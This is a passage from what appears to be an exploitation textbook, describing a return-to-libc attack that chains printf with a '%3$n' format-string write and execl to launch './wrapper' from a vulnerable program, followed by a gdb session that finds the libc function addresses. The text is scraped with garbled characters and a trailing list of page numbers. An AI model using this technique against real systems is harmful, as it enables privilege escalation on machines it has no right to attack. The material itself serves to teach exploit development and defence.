At that point, when the original vulnerable function returns, this new saved
eip will be popped off the stack and printf() executed with the arguments starting with
???%3\$n???, which will write the number of bytes in the format string up to the format
token (0x0000) into the third direct parameter. Since the third parameter contains the
location of itself, the value of 0x0000 will be written into that spot. Next the execl()
function will be called with the arguments from the first ???./wrapper??? string onward.
Voil? , we have created the desired execl() function on the fly with this self-modifying
buffer attack string.
To build the preceding exploit, we need the following information:
??? The address of the printf() function
??? The address of the execl() function
??? The address of the ???%3\$n??? string in memory (we will use the environment
section)
??? The address of the ???./wrapper??? string in memory (we will use the environment
section)
??? The address of the location we wish to overwrite with a NULL value
Starting at the top, let??™s get the addresses.
BT book $ gdb -q vuln2
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80483aa
(gdb) r
Starting program: /mnt/sda1/book/book/vuln2
Breakpoint 1, 0x080483aa in main ()
(gdb) p printf
$1 = {
} 0xb7ee6580
(gdb) p execl
$2 = {} 0xb7f2f870
(gdb) q
The program is running.
Pages:
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375